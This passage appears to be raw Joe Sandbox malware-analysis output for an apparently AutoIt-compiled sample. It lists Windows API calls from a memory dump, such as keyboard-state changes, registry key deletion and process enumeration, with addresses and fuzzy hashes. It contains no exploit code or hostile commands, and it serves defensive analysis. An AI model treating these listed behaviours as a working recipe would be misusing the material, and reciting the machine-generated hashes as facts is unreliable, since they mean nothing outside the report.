                                                                                                                                                          • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                                                                                                                                                          • Part of subcall function 00A93BCF: _wcscpy.LIBCMT ref: 00A93BF2
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00AF2320
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00AF232F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 4082843840-2766056989
                                                                                                                                                        APIs
                                                                                                                                                        • GetParent.USER32(?), ref: 00AD481D
                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00AD4832
                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 00AD4893
                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00AD48C1
                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00AD48E0
                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00AD4926
                                                                                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00AD4949
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                                        APIs
                                                                                                                                                        • GetParent.USER32(00000000), ref: 00AD4638
                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00AD464D
                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 00AD46AE
                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00AD46DA
                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00AD46F7
                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00AD473B
                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00AD475C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcsncpy$LocalTime
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2945705084-0
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AF9DB0
                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AF9E57
                                                                                                                                                        • IsMenu.USER32(?), ref: 00AF9E6F
                                                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AF9EB7
                                                                                                                                                        • DrawMenuBar.USER32 ref: 00AF9ED0
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 3866635326-4108050209
                                                                                                                                                        APIs
                                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00AF3C92
                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AF3CBC
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00AF3D71
                                                                                                                                                          • Part of subcall function 00AF3C63: RegCloseKey.ADVAPI32(?), ref: 00AF3CD9
                                                                                                                                                          • Part of subcall function 00AF3C63: FreeLibrary.KERNEL32(?), ref: 00AF3D2B
                                                                                                                                                          • Part of subcall function 00AF3C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00AF3D4E
                                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00AF3D16
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                         • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                         • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                         • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                         • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                         • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                         • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                         • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                         • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                         • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                         • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 395352322-0
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00AF8DF4
                                                                                                                                                        • GetWindowLongW.USER32(00DA9668,000000F0), ref: 00AF8E27
                                                                                                                                                        • GetWindowLongW.USER32(00DA9668,000000F0), ref: 00AF8E5C
                                                                                                                                                        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00AF8E8E
                                                                                                                                                        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00AF8EB8
                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AF8EC9
                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AF8EE3
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LongWindow$MessageSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2178440468-0
                                                                                                                                                        APIs
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AD1734
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AD175A
                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00AD175D
                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00AD177B
                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00AD1784
                                                                                                                                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 00AD17A9
                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00AD17B7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3761583154-0
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00A931DA
                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00AD6A2B
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00AD6A49
                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00AD6A62
                                                                                                                                                          • Part of subcall function 00AD6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00AD6DBA
                                                                                                                                                          • Part of subcall function 00AD6D6D: GetLastError.KERNEL32 ref: 00AD6DC5
                                                                                                                                                          • Part of subcall function 00AD6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00AD6DD9
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AD6AA4
                                                                                                                                                        • SHFileOperationW.SHELL32(?), ref: 00AD6B0C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                                                                                                                                        • String ID: \*.*
                                                                                                                                                        • API String ID: 2323102230-1173974218
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __wcsnicmp
                                                                                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                        • API String ID: 1038674560-2734436370
                                                                                                                                                        APIs
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AD180D
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AD1833
                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00AD1836
                                                                                                                                                        • SysAllocString.OLEAUT32 ref: 00AD1857
                                                                                                                                                        • SysFreeString.OLEAUT32 ref: 00AD1860
                                                                                                                                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 00AD187A
                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00AD1888
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3761583154-0
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AAC657
                                                                                                                                                          • Part of subcall function 00AAC619: GetStockObject.GDI32(00000011), ref: 00AAC66B
                                                                                                                                                          • Part of subcall function 00AAC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AAC675
                                                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00AFA13B
                                                                                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00AFA148
                                                                                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00AFA153
                                                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00AFA162
                                                                                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00AFA16E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                        • String ID: Msctls_Progress32
                                                                                                                                                        • API String ID: 1025951953-3636473452
                                                                                                                                                        APIs
                                                                                                                                                        • __getptd_noexit.LIBCMT ref: 00AB4C3E
                                                                                                                                                          • Part of subcall function 00AB86B5: GetLastError.KERNEL32(?,00AB0127,00AB88A3,00AB4673,?,?,00AB0127,?,00A9125D,00000058,?,?), ref: 00AB86B7
                                                                                                                                                          • Part of subcall function 00AB86B5: __calloc_crt.LIBCMT ref: 00AB86D8
                                                                                                                                                          • Part of subcall function 00AB86B5: GetCurrentThreadId.KERNEL32 ref: 00AB8701
                                                                                                                                                          • Part of subcall function 00AB86B5: SetLastError.KERNEL32(00000000,00AB0127,00AB88A3,00AB4673,?,?,00AB0127,?,00A9125D,00000058,?,?), ref: 00AB8719
                                                                                                                                                        • CloseHandle.KERNEL32(?,?,00AB4C1D), ref: 00AB4C52
                                                                                                                                                        • __freeptd.LIBCMT ref: 00AB4C59
                                                                                                                                                        • RtlExitUserThread.NTDLL(00000000,?,00AB4C1D), ref: 00AB4C61
                                                                                                                                                        • GetLastError.KERNEL32(?,?,00AB4C1D), ref: 00AB4C91
                                                                                                                                                        • RtlExitUserThread.NTDLL(00000000,?,?,00AB4C1D), ref: 00AB4C98
                                                                                                                                                        • __freefls@4.LIBCMT ref: 00AB4CB4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1445074172-0
                                                                                                                                                        APIs
                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00AAC6C0
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00AAC701
                                                                                                                                                        • ScreenToClient.USER32(?,000000FF), ref: 00AAC729
                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00AAC856
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00AAC86F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1296646539-0
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove$__itow__swprintf
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3253778849-0
                                                                                                                                                        • Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                                                        • Instruction ID: 215c560de5bdc1a4a784d893a71f10655db4ff5e9c993f0caced5101ab085af9
                                                                                                                                                        • Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                                                        • Instruction Fuzzy Hash: 5961BB3061020AAFCF05EF64CE82EFF37A9AF45304F04455AF85A6B292EB34D905CB51
                                                                                                                                                        APIs
                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00AF1B09
                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00AF1B17
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 00AF1B45
                                                                                                                                                          • Part of subcall function 00AB297D: __wsplitpath_helper.LIBCMT ref: 00AB29BD
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AF1B5A
                                                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00AF1BD0
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00AF1BE2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1380811348-0
                                                                                                                                                        • Opcode ID: 78b7cfb8bffdb86fa2396e15f426c8c875c3ac661dec7d720c1ae7227fc88a21
                                                                                                                                                        • Instruction ID: 4a7dd3fd3337e33719f94296b3440a26eecb156625e86acf62c223c6c570cc29
                                                                                                                                                        • Opcode Fuzzy Hash: 78b7cfb8bffdb86fa2396e15f426c8c875c3ac661dec7d720c1ae7227fc88a21
                                                                                                                                                        • Instruction Fuzzy Hash: 33517D71504304AFD720EF64C985EABB7ECEF89754F00491EF58997291EB70EA05CBA2
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                          • Part of subcall function 00AF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AF2AA6,?,?), ref: 00AF3B0E
                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AF2FA0
                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AF2FE0
                                                                                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00AF3003
                                                                                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00AF302C
                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00AF306F
                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00AF307C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4046560759-0
                                                                                                                                                        • Opcode ID: ecd267c2217c07a5dd9c89b9f04501a76ebbaa7f476b3e448b5f3ed7c1493c5a
                                                                                                                                                        • Instruction ID: da0f706ab87dce8cea50c38d95943bef1182f50efcc6191a70a1cb352257fa87
                                                                                                                                                        • Opcode Fuzzy Hash: ecd267c2217c07a5dd9c89b9f04501a76ebbaa7f476b3e448b5f3ed7c1493c5a
                                                                                                                                                        • Instruction Fuzzy Hash: CA515A322182049FCB05EFA4C995E6FB7F9BF88314F04491EF646872A1DB71EA15CB52
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscpy$_wcscat
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2037614760-0
                                                                                                                                                        • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                                                        • Instruction ID: 9d612a68bf617f92cd06da002f3852ed67ed8a1c9ea7b5934279fe912c3ec4b6
                                                                                                                                                        • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                                                        • Instruction Fuzzy Hash: AF511530A04215AACF21AFA8C5419FDB7B4FF06720F90804AF5C2AB6D2DBB45F42D790
                                                                                                                                                        APIs
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00AD2AF6
                                                                                                                                                        • VariantClear.OLEAUT32(00000013), ref: 00AD2B68
                                                                                                                                                        • VariantClear.OLEAUT32(00000000), ref: 00AD2BC3
                                                                                                                                                        • _memmove.LIBCMT ref: 00AD2BED
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00AD2C3A
                                                                                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00AD2C68
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1101466143-0
                                                                                                                                                        • Opcode ID: 9a59398e91333c3f317ebe91a625cd08a70fdb08e320fe7750dc95076a621a55
                                                                                                                                                        • Instruction ID: feae901e2471d483c860df602e2918fdce712d629a3b64223a389cfa5dc2cb78
                                                                                                                                                        • Opcode Fuzzy Hash: 9a59398e91333c3f317ebe91a625cd08a70fdb08e320fe7750dc95076a621a55
                                                                                                                                                        • Instruction Fuzzy Hash: 6D517EB5A00209EFDB24CF58C880AAAB7F8FF5C314B15855AE95ADB310D734E951CFA0
                                                                                                                                                        APIs
                                                                                                                                                        • GetMenu.USER32(?), ref: 00AF833D
                                                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00AF8374
                                                                                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00AF839C
                                                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 00AF840B
                                                                                                                                                        • GetSubMenu.USER32(?,?), ref: 00AF8419
                                                                                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00AF846A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 650687236-0
                                                                                                                                                        • Opcode ID: c800e229f955ec9dd30e538c222871f92524c8411eead4a2e9bf8bb949f0f405
                                                                                                                                                        • Instruction ID: 4dc03cf1c00c3d0fa6fb55f95622a9e8ec413596e514aa6f83a79b728ed6c4a2
                                                                                                                                                        • Opcode Fuzzy Hash: c800e229f955ec9dd30e538c222871f92524c8411eead4a2e9bf8bb949f0f405
                                                                                                                                                        • Instruction Fuzzy Hash: 35517C75A0061AAFCF11EFA4CA41AAEB7F4EF48710F108459F915BB351DB38AE418B90
                                                                                                                                                        APIs
                                                                                                                                                        • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00AE9409
                                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00AE9416
                                                                                                                                                        • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00AE943A
                                                                                                                                                        • _strlen.LIBCMT ref: 00AE9484
                                                                                                                                                        • _memmove.LIBCMT ref: 00AE94CA
                                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00AE94F7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2795762555-0
                                                                                                                                                        • Opcode ID: 7f72dd91e9a8c51d586f980d09ca660ca41d0c0228f442e592adf5f9245aa131
                                                                                                                                                        • Instruction ID: f3a19b10384a9190851a70a9e998c8de750c5c9cfa71ff8caf14f313fc7b3479
                                                                                                                                                        • Opcode Fuzzy Hash: 7f72dd91e9a8c51d586f980d09ca660ca41d0c0228f442e592adf5f9245aa131
                                                                                                                                                        • Instruction Fuzzy Hash: D9417275600248AFDB14EBA5CD95EEEB7BDEF48310F108169F516972D2DB30AE41CB60
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AD552E
                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AD5579
                                                                                                                                                        • IsMenu.USER32(00000000), ref: 00AD5599
                                                                                                                                                        • CreatePopupMenu.USER32 ref: 00AD55CD
                                                                                                                                                        • GetMenuItemCount.USER32(000000FF), ref: 00AD562B
                                                                                                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00AD565C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
